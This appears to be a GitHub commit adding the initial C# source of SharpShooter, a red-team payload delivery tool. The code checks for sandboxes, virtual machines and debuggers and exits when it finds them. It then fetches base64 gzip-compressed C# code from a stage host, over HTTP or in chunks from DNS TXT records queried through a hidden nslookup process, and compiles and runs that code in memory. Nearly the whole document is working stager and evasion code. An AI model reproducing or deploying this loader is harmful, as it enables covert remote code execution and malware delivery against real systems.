Initial Release

mdsecactivebreach · Jan 3, 2018 · 8872c0e · 8872c0e
commit 8872c0e
Show file tree

Hide file tree

Showing 25 changed files with 2,391 additions and 0 deletions.
diff --git a/CSharpShooter/CheckPlease.cs b/CSharpShooter/CheckPlease.cs
@@ -0,0 +1,120 @@
+// CheckPlease.cs
+// Sandox evasion checks forming part of the SharpShooter project
+// This is mostly taken from the CheckPlease project
+// https://github.com/Arvanaghi/CheckPlease/
+//
+
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Net.NetworkInformation;
+using System.Text.RegularExpressions;
+
+class CheckPlease
+{
+    // Return value of true means the domain matches the target domain
+    public bool isDomain(string domain)
+    {
+        if (string.Equals(domain, System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName, StringComparison.CurrentCultureIgnoreCase))
+        {
+            return true;
+        }
+
+        return false;
+    }
+
+    // Return value of false means we're not on a domain member
+    public bool isDomainJoined()
+    {
+        if (string.Equals("", System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName, StringComparison.CurrentCultureIgnoreCase))
+        {
+            return false;
+        }
+
+        return true;
+    }
+
+    // Returns true if possible sandbox artifacts exist on file system
+    public bool containsSandboxArtifacts()
+    {
+        List<string> EvidenceOfSandbox = new List<string>();
+        string[] FilePaths = {@"C:\windows\Sysnative\Drivers\Vmmouse.sys",
+        @"C:\windows\Sysnative\Drivers\vm3dgl.dll", @"C:\windows\Sysnative\Drivers\vmdum.dll",
+        @"C:\windows\Sysnative\Drivers\vm3dver.dll", @"C:\windows\Sysnative\Drivers\vmtray.dll",
+        @"C:\windows\Sysnative\Drivers\vmci.sys", @"C:\windows\Sysnative\Drivers\vmusbmouse.sys",
+        @"C:\windows\Sysnative\Drivers\vmx_svga.sys", @"C:\windows\Sysnative\Drivers\vmxnet.sys",
+        @"C:\windows\Sysnative\Drivers\VMToolsHook.dll", @"C:\windows\Sysnative\Drivers\vmhgfs.dll",
+        @"C:\windows\Sysnative\Drivers\vmmousever.dll", @"C:\windows\Sysnative\Drivers\vmGuestLib.dll",
+        @"C:\windows\Sysnative\Drivers\VmGuestLibJava.dll", @"C:\windows\Sysnative\Drivers\vmscsi.sys",
+        @"C:\windows\Sysnative\Drivers\VBoxMouse.sys", @"C:\windows\Sysnative\Drivers\VBoxGuest.sys",
+        @"C:\windows\Sysnative\Drivers\VBoxSF.sys", @"C:\windows\Sysnative\Drivers\VBoxVideo.sys",
+        @"C:\windows\Sysnative\vboxdisp.dll", @"C:\windows\Sysnative\vboxhook.dll",
+        @"C:\windows\Sysnative\vboxmrxnp.dll", @"C:\windows\Sysnative\vboxogl.dll",
+        @"C:\windows\Sysnative\vboxoglarrayspu.dll", @"C:\windows\Sysnative\vboxoglcrutil.dll",
+        @"C:\windows\Sysnative\vboxoglerrorspu.dll", @"C:\windows\Sysnative\vboxoglfeedbackspu.dll",
+        @"C:\windows\Sysnative\vboxoglpackspu.dll", @"C:\windows\Sysnative\vboxoglpassthroughspu.dll",
+        @"C:\windows\Sysnative\vboxservice.exe", @"C:\windows\Sysnative\vboxtray.exe",
+        @"C:\windows\Sysnative\VBoxControl.exe"};
+        foreach (string FilePath in FilePaths)
+        {
+            if (File.Exists(FilePath))
+            {
+                EvidenceOfSandbox.Add(FilePath);
+            }
+        }
+
+        if (EvidenceOfSandbox.Count == 0)
+        {
+            return false;
+        }
+        else
+        {
+            return true;
+        }
+    }
+
+    // Return true is machine matches a bad MAC vendor
+    public bool isBadMac()
+    {
+        List<string> EvidenceOfSandbox = new List<string>();
+
+        string[] badMacAddresses = { @"000C29", @"001C14", @"005056", @"000569", @"080027" };
+
+        NetworkInterface[] NICs = NetworkInterface.GetAllNetworkInterfaces();
+        foreach (NetworkInterface NIC in NICs)
+        {
+            foreach (string badMacAddress in badMacAddresses)
+            {
+                if (NIC.GetPhysicalAddress().ToString().ToLower().Contains(badMacAddress.ToLower()))
+                {
+                    EvidenceOfSandbox.Add(Regex.Replace(NIC.GetPhysicalAddress().ToString(), ".{2}", "$0:").TrimEnd(':'));
+                }
+            }
+        }
+
+        if (EvidenceOfSandbox.Count == 0)
+        {
+            return false;
+        }
+        else
+        {
+            return true;
+        }
+
+    }
+
+    // Return true if a debugger is attached
+    public bool isDebugged()
+    {
+        if (System.Diagnostics.Debugger.IsAttached)
+        {
+            return true;
+        }
+        else
+        {
+            return false;
+        }
+    }
+
+
+}
diff --git a/CSharpShooter/Properties/AssemblyInfo.cs b/CSharpShooter/Properties/AssemblyInfo.cs
@@ -0,0 +1,37 @@
+/* This is modified version of the wonderful DoTNetToJScript Example by James Forshaw */
+
+using System.Reflection;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following 
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("SharpShooterAssembly")]
+[assembly: AssemblyDescription("SharpShooter Payload Delivery")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("MDSec ActiveBreach")]
+[assembly: AssemblyProduct("SharpShooterAssembly")]
+[assembly: AssemblyCopyright("Copyright © MDSec Consulting 2017")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible 
+// to COM components.  If you need to access a type in this assembly from 
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("56598f1c-6d88-4994-a392-af337abe5777")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version 
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers 
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/CSharpShooter/SharpShooter.cs b/CSharpShooter/SharpShooter.cs
@@ -0,0 +1,208 @@
+using Microsoft.CSharp;
+using System.CodeDom.Compiler;
+using System.Reflection;
+using System.Runtime.InteropServices;
+using System.Collections.Generic;
+using System.Net;
+using System.Text;
+using System;
+using System.Diagnostics;
+using System.Text.RegularExpressions;
+using System.IO;
+using System.IO.Compression;
+using System.Windows.Forms;
+
+
+
+[ComVisible(true)]
+public class SharpShooter
+{
+    public SharpShooter()
+    {
+    }
+
+    public void CheckPlease(int check, string arg)
+    {
+        CheckPlease cp = new CheckPlease();
+        switch(check)
+        {
+            case 0:
+                if (!cp.isDomain(arg)) Environment.Exit(1);
+                break;
+            case 1:
+                if (!cp.isDomainJoined()) Environment.Exit(1);
+                break;
+            case 2:
+                if (cp.containsSandboxArtifacts()) Environment.Exit(1);
+                break;
+            case 3:
+                if (cp.isBadMac()) Environment.Exit(1);
+                break;
+            case 4:
+                if (cp.isDebugged()) Environment.Exit(1);
+                break;
+
+        }
+    }
+
+    public void Go(string RefStr, string NameSpace, string EntryPoint, int Technique, string StageHost)
+    {
+        SharpShooter ss = new SharpShooter();
+        string[] Refs = RefStr.Split(",".ToCharArray(), StringSplitOptions.RemoveEmptyEntries);
+
+        try
+        {
+            // Attempt either web delivery (1), DNS delivery (2) or attempt both (3)
+            switch (Technique)
+            {
+                case 1: // web
+                    ss.Shoot(Refs, NameSpace, EntryPoint, true, StageHost);
+                    break;
+                case 2: // dns
+                    ss.Shoot(Refs, NameSpace, EntryPoint, false, StageHost);
+                    break;
+            }
+        }
+        catch(Exception e)
+        {
+            //MessageBox.Show(e.Message);
+            try
+            {
+                // if an error occurs, fall back to try DNS
+                // extract the domain
+                // e.g. URL of http://wwww.example.org/foo becomes example.org for DNS
+                var uri = new Uri(StageHost);
+                string Domain = uri.Host;
+                ss.Shoot(Refs, NameSpace, EntryPoint, false, Domain);
+            }
+            catch { }
+        }
+    }
+
+    private string AimWeb(string url)
+    {
+        WebClient client = new WebClient();
+        // empty user agent is sometimes an indicator
+        client.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko");
+        client.UseDefaultCredentials = true;
+        string EncodedScript = client.DownloadString(url);
+        byte[] data = Convert.FromBase64String(EncodedScript);
+        string decodedScript = Unzip(data);
+        return decodedScript;
+    }
+
+    private string LookupDNS(string hostname)
+    {
+        // Modified version of:
+        // http://www.robertsindall.co.uk/blog/blog/2011/05/09/getting-dns-txt-record-using-c-sharp/
+        string txtRecords = "";
+        string block = "";
+        string output;
+        string pattern = string.Format(@"{0}\s*text =\s*([""])(.*?)([""])", hostname);
+        string val = @"([""])(.*?)([""])";
+        var startInfo = new ProcessStartInfo("nslookup");
+        startInfo.Arguments = string.Format("-type=TXT -timeout=5 {0}", hostname);
+        startInfo.RedirectStandardOutput = true;
+        startInfo.UseShellExecute = false;
+        startInfo.WindowStyle = ProcessWindowStyle.Hidden;
+
+        using (var cmd = Process.Start(startInfo))
+        {
+            output = cmd.StandardOutput.ReadToEnd();
+        }
+
+        Match match = Regex.Match(output, pattern, RegexOptions.IgnoreCase);
+        if (match.Success)
+        {
+            txtRecords = match.Groups[0].Value;
+            Match m = Regex.Match(txtRecords, val, RegexOptions.IgnoreCase);
+            block = m.Groups[0].Value;
+        }
+        return block.Replace(@"""", string.Empty);
+    }
+
+    private string AimDNS(string domain)
+    {
+        string block0 = LookupDNS("0." + domain);
+        // Find the number of blocks from PowerDNS
+        int count = Int32.Parse(block0.Substring(17, block0.IndexOf(";", 17) - 17));
+        // Loop and retrieve every block to get a base64 copy of the script
+        string EncodedScript = "";
+        for (int i = 1; i <= count; i++)
+            EncodedScript += LookupDNS(i + "." + domain);
+
+        byte[] data = Convert.FromBase64String(EncodedScript);
+        string decodedScript = Unzip(data);
+
+        return decodedScript;
+    }
+
+    private void CopyTo(Stream src, Stream dest)
+    {
+        byte[] bytes = new byte[4096];
+
+        int cnt;
+
+        while ((cnt = src.Read(bytes, 0, bytes.Length)) != 0)
+        {
+            dest.Write(bytes, 0, cnt);
+        }
+    }
+    private string Unzip(byte[] bytes)
+    {
+        using (var msi = new MemoryStream(bytes))
+        using (var mso = new MemoryStream())
+        {
+            using (var gs = new GZipStream(msi, CompressionMode.Decompress))
+            {
+                CopyTo(gs, mso);
+            }
+
+            return Encoding.UTF8.GetString(mso.ToArray());
+        }
+    }
+
+    private void Shoot(string[] refs, string EntryPoint, string Method, bool technique, string stagerhost)
+    {
+        CheckPlease cp = new CheckPlease();
+
+        Dictionary<string, string> compilerInfo = new Dictionary<string, string>();
+        compilerInfo.Add("CompilerVersion", "v3.5");
+        CSharpCodeProvider provider = new CSharpCodeProvider(compilerInfo);
+        CompilerParameters parameters = new CompilerParameters();
+
+        foreach (string r in refs)
+            parameters.ReferencedAssemblies.Add(r);
+
+        parameters.GenerateExecutable = false;
+        parameters.GenerateInMemory = true;
+        parameters.CompilerOptions = "/unsafe /platform:x86";
+        // Try and enforce the local appdata temp folder - .cs file written here so need to avoid c:\windows\temp for UAC enforced
+        String tmp = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Temp");
+        parameters.TempFiles = new TempFileCollection(tmp, false);
+        string code;
+        // true = stage via web
+        // false = stage via dns
+        if (technique)
+            code = AimWeb(stagerhost);
+        else code = AimDNS(stagerhost);
+        CompilerResults results = provider.CompileAssemblyFromSource(parameters, code);
+        if (results.Errors.HasErrors)
+        {
+            StringBuilder sb = new StringBuilder();
+
+            foreach (CompilerError error in results.Errors)
+            {
+                sb.AppendLine(String.Format("Error ({0}): {1}", error.ErrorNumber, error.ErrorText));
+            }
+
+            throw new InvalidOperationException(sb.ToString());
+        }
+        Assembly assembly = results.CompiledAssembly;
+        Type program = assembly.GetType(EntryPoint);
+        MethodInfo main = program.GetMethod(Method);
+        main.Invoke(null, null);
+    }
+}
+
+